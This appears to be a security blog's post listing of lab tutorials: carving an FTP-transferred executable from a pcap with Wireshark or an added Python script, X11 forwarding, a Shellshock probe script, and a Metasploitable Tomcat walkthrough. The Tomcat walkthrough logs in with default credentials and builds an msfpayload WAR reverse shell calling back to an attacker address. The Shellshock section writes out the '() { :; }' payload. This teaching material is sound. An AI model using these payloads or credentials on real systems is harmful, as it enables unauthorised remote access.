Extracting Windows executables with Wireshark

This is an example of how to use Wireshark to extract a Windows executable file from an FTP transfer between two computers on the same network. In this walkthrough I’ll be using three VMs:
- A Linux VM to serve as the FTP server with a file on it. (Bottom right)
- A Windows XP VM to connect to the Linux server and download the file. (Top right)
- A Kali Linux VM to listen to the network while the file transfer happens. (Left)

[Image: the three VMs, laid out as described above]

I’ll start by setting up Wireshark on my Kali VM to capture in promiscuous mode, then click Start so Wireshark begins recording traffic on the network. One caveat: on a switched network, promiscuous mode alone only shows you broadcast traffic and frames addressed to your own interface, so for the Kali VM to see a transfer between the other two VMs they must sit on a virtual network that delivers every frame to a promiscuous interface (VirtualBox, for example, needs the adapter's promiscuous-mode setting changed from Deny to Allow All), or you need a hub or a SPAN/mirror port.
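Once the capture is saved, the manual Wireshark workflow is to find the FTP-DATA connection, Follow TCP Stream, show the data as Raw and Save As. The script below is an added example (not part of the original post) that does the same thing from a pcap with only the Python standard library: it reassembles every TCP flow by sequence number, reads the RETR filename off the control channel, and carves the first data flow that starts with the DOS/PE "MZ" signature. The capture it runs on is constructed inline (made-up hosts 192.168.56.101/.102, a fake executable named sample.exe), with segments delivered out of order and one retransmitted, so it exercises the reassembly offline.

```python
import hashlib
import struct
from collections import defaultdict

PCAP_MAGIC_LE = 0xA1B2C3D4                       # classic pcap, microsecond stamps


def build_pcap(frames):
    """Classic little-endian pcap image (LINKTYPE_ETHERNET = 1) from raw frames."""
    hdr = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, 1)
    return hdr + b"".join(struct.pack("<IIII", i, 0, len(f), len(f)) + f
                          for i, f in enumerate(frames))


def tcp_frame(src, dst, sport, dport, seq, payload):
    """Ethernet/IPv4/TCP frame; checksums stay zero since nothing validates them."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp + payload


def tcp_streams(pcap):
    """Yield (flow, data, gaps) per unidirectional TCP flow, payload reassembled
    by sequence number: out-of-order segments sorted, retransmitted bytes dropped,
    uncaptured ranges counted in gaps (Wireshark's 'Previous segment not captured').
    32-bit sequence wrap is ignored; fine for a capture of one short transfer."""
    if struct.unpack_from("<I", pcap, 0)[0] != PCAP_MAGIC_LE:
        raise ValueError("expected a classic little-endian pcap (not pcapng)")
    segs, off = defaultdict(list), 24
    while off + 16 <= len(pcap):
        incl = struct.unpack_from("<IIII", pcap, off)[2]
        frame = pcap[off + 16:off + 16 + incl]
        off += 16 + incl
        if len(frame) < 54 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue                                 # IPv4-over-Ethernet TCP only
        ip = frame[14:14 + struct.unpack_from("!H", frame, 16)[0]]  # drop Ethernet padding
        src, dst = ".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20]))
        tcp = ip[(ip[0] & 0x0F) * 4:]
        sport, dport, seq = struct.unpack_from("!HHI", tcp, 0)
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            segs[(src, sport, dst, dport)].append((seq, payload))
    for flow, lst in segs.items():
        lst.sort(key=lambda s: s[0])
        data, nxt, gaps = bytearray(), lst[0][0], 0
        for seq, pl in lst:
            end = seq + len(pl)
            if end <= nxt:
                continue                             # pure retransmission
            if seq < nxt:
                pl = pl[nxt - seq:]                  # partial overlap
            elif seq > nxt:
                gaps += 1                            # hole: carved file would be corrupt
            data += pl
            nxt = end
        yield flow, bytes(data), gaps


def carve_ftp_transfer(pcap):
    """(name from RETR on the control channel, file bytes, sha256) for the first
    non-control flow that starts with the DOS/PE 'MZ' signature."""
    streams = list(tcp_streams(pcap))
    name = None
    for (_, _, _, dport), data, _ in streams:
        if dport == 21:
            for line in data.split(b"\r\n"):
                if line.upper().startswith(b"RETR "):
                    name = line[5:].decode("ascii", "replace")
    for (_, sport, _, dport), data, gaps in streams:
        if 21 not in (sport, dport) and data[:2] == b"MZ":
            if gaps:
                raise ValueError(f"data stream has {gaps} hole(s); carve would be corrupt")
            return name, data, hashlib.sha256(data).hexdigest()
    return name, None, None


def fake_executable():
    """Constructed stand-in for the downloaded .exe: DOS stub header plus filler."""
    stub = b"MZ\x90\x00" + b"This program cannot be run in DOS mode.".ljust(1020, b"\x00")
    return stub + b"PE\x00\x00" + bytes(range(256)) * 4


def sample_capture():
    """Constructed passive-mode FTP session (client .101, server .102); the data
    segments arrive out of order and one is sent twice."""
    c, s = "192.168.56.101", "192.168.56.102"
    exe = fake_executable()
    chunks = [(i, exe[i:i + 1000]) for i in range(0, len(exe), 1000)]
    ctl = [tcp_frame(c, s, 40001, 21, 1, b"USER anonymous\r\n"),
           tcp_frame(s, c, 21, 40001, 1, b"230 Login successful.\r\n"),
           tcp_frame(c, s, 40001, 21, 17, b"PASV\r\n"),
           tcp_frame(s, c, 21, 40001, 24, b"227 Entering Passive Mode (192,168,56,102,200,10).\r\n"),
           tcp_frame(c, s, 40001, 21, 23, b"RETR sample.exe\r\n"),
           tcp_frame(s, c, 21, 40001, 76, b"150 Opening BINARY mode data connection.\r\n")]
    data = [tcp_frame(s, c, 51210, 40002, 0x10000 + chunks[i][0], chunks[i][1])
            for i in (1, 0, 0, 2)]                   # second chunk first, first chunk twice
    return build_pcap(ctl + data)


if __name__ == "__main__":
    name, blob, digest = carve_ftp_transfer(sample_capture())
    with open(name or "carved.bin", "wb") as fh:    # the scripted Save As
        fh.write(blob)
    print(f"wrote {len(blob)} bytes to {name}; sha256 {digest}")
```

Two checks worth keeping from the manual workflow: the transfer must have been in binary mode (TYPE I), since an ASCII-mode transfer rewrites line endings and the carved bytes will not match, and the hash of the carved file should be compared with the copy on the FTP server before you trust it.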

X11 Forwarding Mac

This tutorial is going to cover setting up X11 forwarding via SSH from your Kali box to your Mac.  This is a great way to host your Kali machine on a server (Home Server or VPS) and still have access to tools like Burp that require a GUI.

The first thing you will need to do is download and install XQuartz from http://xquartz.macosforge.org/landing/

Next we need to enable the SSH server service on the Kali box. The SSH daemon also has to be allowed to forward X11 (X11Forwarding yes in /etc/ssh/sshd_config, then restart the service), and the connection from the Mac is made with ssh -X or ssh -Y so that DISPLAY is set inside the session.

[Screenshot, 2014-10-03: enabling the SSH server service]
Let's make sure we know the IP of our machine. This is my internal lab machine, so the IP is not routable; if you were going through a firewall you would obviously need to forward SSH to your Kali box before trying to SSH to your external IP address.

Shellshock demo set-up and POC

I’m not sure if everyone has been made aware of this, but a BASH vulnerability has been discovered… /sarcasm

OK, seriously, as everyone has heard by now, “Shellshock” is the hot topic right now. Since I am one who learns by doing, I decided to give it a go and see exactly how it works. My first instinct was to see how it works against the SSH protocol (a CGI write-up is coming soon). Now that I have seen what it actually is, it would take an extraordinary set of circumstances for it to be a viable method of gaining entry (at least through SSH), but should those circumstances be present in your environment, it could be devastating (so make sure you patch everything up!).
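For readers who want to see the mechanism rather than just the headline, here is an added example (not part of the original post) that scripts the classic probe. The bug is that an unpatched bash imports any environment variable whose value begins with "() {" as a function definition and keeps executing whatever follows the closing brace at start-up. The variable name does not matter, which is why CGI (request headers become HTTP_* variables) and sshd forced commands (the requested command lands in SSH_ORIGINAL_COMMAND before the login shell runs) are the delivery paths; the SSH path is the "extraordinary set of circumstances" above, because the attacker already needs a key or password that is restricted to a forced command. The trailer in the probe only echoes a marker; no other command is executed, and the shell binary to probe is an assumption.

```python
import os
import shutil
import subprocess

MARKER = "shellshock-probe-ran"


def shellshock_probe(shell="bash", var_name="SSH_ORIGINAL_COMMAND"):
    """Start `shell` with one environment variable whose value is a function
    definition followed by a trailing command. An unpatched bash imports the
    function and runs the trailer at start-up; a fixed bash treats the value as
    an ordinary string. Returns True (vulnerable), False (not vulnerable), or
    None if the binary cannot be found. The trailer only echoes a marker."""
    path = shutil.which(shell)
    if path is None:
        return None
    env = dict(os.environ)
    env[var_name] = "() { :; }; echo " + MARKER          # the whole payload
    proc = subprocess.run([path, "-c", "echo probe"], env=env,
                          capture_output=True, text=True, timeout=10)
    return MARKER in proc.stdout


def probe_common_vectors(shell="bash"):
    """Same probe under the variable names that CGI and sshd hand to bash;
    any True means the bug is reachable through that path."""
    names = ("HTTP_USER_AGENT", "HTTP_COOKIE", "SSH_ORIGINAL_COMMAND")
    return {name: shellshock_probe(shell, name) for name in names}


if __name__ == "__main__":
    labels = {True: "VULNERABLE", False: "patched", None: "no such shell"}
    for name, result in probe_common_vectors().items():
        print(f"{name:22s} {labels[result]}")
```

Running it against a current bash prints "patched" for every name; against the bash of late September 2014 every line reads VULNERABLE, whichever variable carries the payload.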

Metasploitable Series – Tomcat

In this episode we are going to take a look at the Tomcat Service on our Metasploitable Box.

Let's start with an Nmap scan…

[Screenshot: Nmap scan results showing Tomcat on port 8180]
We can see Tomcat running on port 8180. Let's take a look at it.

As we can see, the Tomcat manager requires a login. The Metasploitable build ships with the manager username and password both set to ‘tomcat’, so let's try that.

We have logged into the manager application! Let's now generate a reverse shell in WAR form, which the manager will happily deploy for us.

msfpayload linux/x86/shell_reverse_tcp LHOST=172.16.28.245 LPORT=4444 W > myshell.war

Note that a reverse shell takes LHOST, not RHOST: it is the address the target connects back to, so 172.16.28.245 here must be your Kali/attacking machine. Start a listener on that port (netcat will do) before deploying myshell.war and browsing to its context path, or the connection back has nowhere to go.

Simple Buffer Overflow bypassing SEH

Here recently, I have gotten more interested in exploit writing and the entire process behind it. Being that I am a noob to this, I obviously started my quest by looking for tutorials. Unfortunately I wasn’t able to find the “Explain like I’m 5” tutorial that I needed, and the entire process took me much longer than anticipated. Now that I finally have it figured out, I wanted to share it with the world! 😀

New Video Series

We are excited to announce that we have started production on our first video series, “Metasploitable without Metasploit”! The focus of this video series is to teach the up-and-coming InfoSec student how to manually exploit Metasploitable. This will help you get a much better understanding of why these exploits work and what makes them tick.

Don’t get us wrong, we love Metasploit, but we also feel it is important to have a solid foundation in exploitation the manual way. This video series was inspired by taking the OSCP course, which has very strict guidelines for when and how you can use Metasploit.

The opinions and thoughts on this blog are those of Overflow Security members, and do not reflect those of our members’ employers.